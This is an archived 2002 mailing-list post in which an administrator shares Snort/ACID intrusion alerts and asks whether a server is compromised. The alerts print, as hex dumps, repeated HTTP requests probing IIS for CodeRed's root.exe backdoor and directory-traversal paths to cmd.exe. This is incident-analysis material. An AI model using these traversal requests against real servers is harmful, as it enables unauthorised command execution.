I just wanted to share. It appears to be a compromised host. Any thoughts? Generated by ACID v0.9.6b21 on Fri June 28, 2002 10:16:08 ------------------------------------------------------------------------ ------ #(1 - 8203) [2002-06-28 07:52:05] [url/www.cert.org/advisories/CA-2001-19.html] WEB-IIS CodeRed v2 root.exe access IPv4: 63.225.18.129 -> x.x.x.23 hlen=5 TOS=0 dlen=112 ID=64072 flags=0 offset=0 TTL=107 chksum=5814 TCP: port=4162 -> dport: 80 flags=***AP*** seq=1758262495 ack=3285962122 off=5 res=0 win=17520 urp=0 chksum=36882 Payload: length = 72 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F GET /scripts/roo 010 : 74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 t.exe?/c+dir HTT 020 : 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 P/1.0..Host: www 030 : 0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 ..Connnection: c 040 : 6C 6F 73 65 0D 0A 0D 0A lose.... ------------------------------------------------------------------------ ------ #(1 - 8204) [2002-06-28 07:52:06] WEB-IIS cmd.exe access IPv4: 63.225.18.129 -> x.x.x.23 hlen=5 TOS=0 dlen=120 ID=64169 flags=0 offset=0 TTL=107 chksum=5709 TCP: port=4193 -> dport: 80 flags=***AP*** seq=1759864606 ack=3286219316 off=5 res=0 win=17520 urp=0 chksum=63927 Payload: length = 80 000 : 47 45 54 20 2F 63 2F 77 69 6E 6E 74 2F 73 79 73 GET /c/winnt/sys 010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c 020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H 030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: <www..Connne> 040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close.... ------------------------------------------------------------------------ ------ #(1 - 8205) [2002-06-28 07:52:06] WEB-IIS cmd.exe access IPv4: 63.225.18.129 -> x.x.x.23 hlen=5 TOS=0 dlen=120 ID=64219 flags=0 offset=0 TTL=107 chksum=5659 TCP: port=4208 -> dport: 80 flags=***AP*** seq=1760722868 ack=3286352844 off=5 res=0 win=17520 urp=0 chksum=55146 Payload: length = 80 000 : 47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73 GET /d/winnt/sys 010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c 020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H 030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: <www..Connne> 040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close.... ------------------------------------------------------------------------ ------ #(1 - 8206) [2002-06-28 07:52:06] WEB-IIS cmd.exe access IPv4: 63.225.18.129 -> x.x.x.23 hlen=5 TOS=0 dlen=136 ID=64274 flags=0 offset=0 TTL=107 chksum=5588 TCP: port=4230 -> dport: 80 flags=***AP*** seq=1761911317 ack=3286485480 off=5 res=0 win=17520 urp=0 chksum=31284 Payload: length = 94 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d 030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 ir r HTTP/1.0..H 040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: <www..Connne> 050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A ction: close.. ------------------------------------------------------------------------ ------ #(1 - 8207) [2002-06-28 07:52:06] WEB-IIS cmd.exe access IPv4: 63.225.18.129 -> x.x.x.23 hlen=5 TOS=0 dlen=157 ID=64304 flags=0 offset=0 TTL=107 chksum=5537 TCP: port=4241 -> dport: 80 flags=***AP*** seq=1762498299 ack=3286554292 off=5 res=0 win=17520 urp=0 chksum=48821 Payload: length = 111 000 : 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/.. 010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E %5c../..%5c../.. 020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 %5c../winnt/syst 030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+ 040 : 64 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 dir c+dir HTTP/1 050 : 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 .0..Host: <www..C> 060 : 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F onnnection: clo ------------------------------------------------------------------------ ------ #(1 - 8208) [2002-06-28 07:52:07] WEB-IIS cmd.exe access IPv4: 63.225.18.129 -> x.x.x.23 hlen=5 TOS=0 dlen=157 ID=64336 flags=0 offset=0 TTL=107 chksum=5505 TCP: port=4245 -> dport: 80 flags=***AP*** seq=1762733150 ack=3286642898 off=5 res=0 win=17520 urp=0 chksum=54330 Payload: length = 111 000 : 47 45 54 20 2F 5F 6D 65 6D 5F 62 69 6E 2F 2E 2E GET /_mem_bin/.. 010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E %5c../..%5c../.. 020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 %5c../winnt/syst 030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+ 040 : 64 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 dir c+dir HTTP/1 050 : 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 .0..Host: <www..C> 060 : 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F onnnection: clo ------------------------------------------------------------------------ ------ #(1 - 8209) [2002-06-28 07:52:07] WEB-IIS cmd.exe access IPv4: 63.225.18.129 -> x.x.x.23 hlen=5 TOS=0 dlen=185 ID=64393 flags=0 offset=0 TTL=107 chksum=5420 TCP: port=4266 -> dport: 80 flags=***AP*** seq=1763771120 ack=3286783288 off=5 res=0 win=17520 urp=0 chksum=31957 Payload: length = 127 000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 35 63 GET /msadc/..%5c 010 : 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E 25 35 63 ../..%5c../..%5c 020 : 2F 2E 2E 35 35 2E 2E 2F 2E 2E 63 31 2E 2E 2F 2E /..55../..c1../. 030 : 2E 2F 2E 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 ./.../winnt/syst 040 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+ 050 : 64 69 72 20 33 32 2F 63 6D 64 2E 65 78 65 3F 2F dir 32/cmd.exe?/ 060 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0.. 070 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E Host: <www..Conn> ------------------------------------------------------------------------ ------ #(1 - 8210) [2002-06-28 07:52:07] WEB-IIS cmd.exe access IPv4: 63.225.18.129 -> x.x.x.23 hlen=5 TOS=0 dlen=137 ID=64445 flags=0 offset=0 TTL=107 chksum=5416 TCP: port=4282 -> dport: 80 flags=***AP*** seq=1764599933 ack=3286923590 off=5 res=0 win=17520 urp=0 chksum=20527 Payload: length = 93 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A r dir HTTP/1.0.. 040 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E Host: <www..Connn> 050 : 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 ection: close ------------------------------------------------------------------------ ------ #(1 - 8211) [2002-06-28 07:52:07] WEB-IIS cmd.exe access IPv4: 63.225.18.129 -> x.x.x.23 hlen=5 TOS=0 dlen=137 ID=64576 flags=0 offset=0 TTL=107 chksum=5285 TCP: port=4296 -> dport: 80 flags=***AP*** seq=1765284633 ack=3287017192 off=5 res=0 win=17520 urp=0 chksum=27863 Payload: length = 93 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A r dir HTTP/1.0.. 040 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E Host: <www..Connn> 050 : 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 ection: close ------------------------------------------------------------------------ ------ #(1 - 8212) [2002-06-28 07:52:08] WEB-IIS cmd.exe access IPv4: 63.225.18.129 -> x.x.x.23 hlen=5 TOS=0 dlen=137 ID=64681 flags=0 offset=0 TTL=107 chksum=5180 TCP: port=4317 -> dport: 80 flags=***AP*** seq=1766573669 ack=3287133452 off=5 res=0 win=17520 urp=0 chksum=64269 Payload: length = 93 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A r dir HTTP/1.0.. 040 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E Host: <www..Connn> 050 : 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 ection: close ------------------------------------------------------------------------ ------ #(1 - 8213) [2002-06-28 07:52:08] WEB-IIS cmd.exe access IPv4: 63.225.18.129 -> x.x.x.23 hlen=5 TOS=0 dlen=137 ID=64745 flags=0 offset=0 TTL=107 chksum=5116 TCP: port=4343 -> dport: 80 flags=***AP*** seq=1768029370 ack=3287264240 off=5 res=0 win=17520 urp=0 chksum=51401 Payload: length = 93 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A r dir HTTP/1.0.. 040 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E Host: <www..Connn> 050 : 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 ection: close ------------------------------------------------------------------------ ------ #(1 - 8214) [2002-06-28 07:52:08] WEB-IIS cmd.exe access IPv4: 63.225.18.129 -> x.x.x.23 hlen=5 TOS=0 dlen=138 ID=64793 flags=0 offset=0 TTL=107 chksum=5067 TCP: port=4360 -> dport: 80 flags=***AP*** seq=1768931344 ack=3287372593 off=5 res=0 win=17520 urp=0 chksum=43264 Payload: length = 94 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d 030 : 69 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D ir dir HTTP/1.0. 040 : 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E .Host: <www..Conn> 050 : 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 nection: close ------------------------------------------------------------------------ ------ #(1 - 8215) [2002-06-28 07:52:09] WEB-IIS cmd.exe access IPv4: 63.225.18.129 -> x.x.x.23 hlen=5 TOS=0 dlen=136 ID=64832 flags=0 offset=0 TTL=107 chksum=5030 TCP: port=4371 -> dport: 80 flags=***AP*** seq=1769565695 ack=3287454509 off=5 res=0 win=17520 urp=0 chksum=61686 Payload: length = 94 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d 030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 ir r HTTP/1.0..H 040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: <www..Connne> 050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A ction: close.. ------------------------------------------------------------------------ ------ #(1 - 8216) [2002-06-28 07:52:09] WEB-IIS cmd.exe access IPv4: 63.225.18.129 -> x.x.x.23 hlen=5 TOS=0 dlen=140 ID=64855 flags=0 offset=0 TTL=107 chksum=5003 TCP: port=4383 -> dport: 80 flags=***AP*** seq=1770136512 ack=3287543887 off=5 res=0 win=17520 urp=0 chksum=30159 Payload: length = 94 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d 030 : 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 2E ir c+dir HTTP/1. 040 : 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 0..Host: <www..Co> 050 : 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F nnnection: clo ------------------------------------------------------------------------ ------ #(1 - 8217) [2002-06-28 07:52:09] WEB-IIS cmd.exe access IPv4: 63.225.18.129 -> x.x.x.23 hlen=5 TOS=0 dlen=136 ID=64887 flags=0 offset=0 TTL=107 chksum=4975 TCP: port=4394 -> dport: 80 flags=***AP*** seq=1770745706 ack=3287647877 off=5 res=0 win=17520 urp=0 chksum=61954 Payload: length = 94 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 2f../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d 030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 ir r HTTP/1.0..H 040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: <www..Connne> 050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A ction: close..
This archive was generated by hypermail 2b30 : Fri Jun 28 2002 - 13:12:44 PDT